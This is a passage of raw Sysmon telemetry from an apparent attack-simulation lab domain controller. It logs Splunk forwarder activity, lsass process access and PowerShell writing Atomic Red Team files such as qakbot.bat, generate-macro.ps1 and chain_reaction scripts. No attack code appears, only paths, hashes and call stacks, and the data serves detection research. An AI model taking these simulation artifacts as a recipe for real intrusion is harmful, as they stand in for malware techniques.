Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8599-5FCF-CF00-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8599-5FCF-CF00-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8599-5FCF-CF00-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-859B-5FCF-D100-000000009101}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-859B-5FCF-D100-000000009101}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.587{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-859B-5FCF-D100-000000009101}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:35.588{10ACEC4A-859B-5FCF-D100-000000009101}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.961{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1016\src\top-128.txt2020-12-08 13:54:36.961 11241100x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.961{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1016\src\qakbot.bat2020-12-08 13:54:36.961 11241100x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:36.945{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1014\bin\puppetstrings.exe2020-12-08 13:54:36.945 11241100x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.711{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\LICENSE.txt2020-12-08 13:54:36.711 11241100x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.711{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Misc\flag.txt2020-12-08 13:54:36.711 11241100x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.711{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Misc\Discovery.bat2020-12-08 13:54:36.711 11241100x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.711{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Labs\Webinar11062017-Labs.bat2020-12-08 13:54:36.711 11241100x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.696{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Initial_Access\generate-macro.ps12020-12-08 13:54:36.696 11241100x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.696{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Initial_Access\AtomicHTA.hta2020-12-08 13:54:36.696 11241100x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.680{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\qbot_infection_reaction.vbs2020-12-08 13:54:36.680 11241100x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.680{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\dragonstail_benign.ps12020-12-08 13:54:36.680 11241100x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.680{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Reactor.bat2020-12-08 13:54:36.680 11241100x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Plutonium.bat2020-12-08 13:54:36.664 11241100x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Fission.bat2020-12-08 13:54:36.664 11241100x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_DragonsTail.ps12020-12-08 13:54:36.664 11241100x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_DragonsTail.bat2020-12-08 13:54:36.664 11241100x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Cyclotron.bat2020-12-08 13:54:36.664 11241100x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\chain_reaction_Argonaut.ps12020-12-08 13:54:36.664 11241100x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:36.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\ARTifacts\Chain_Reactions\atomic-hello.exe2020-12-08 13:54:36.664 10341000x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.009{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.009{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:36.009{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SY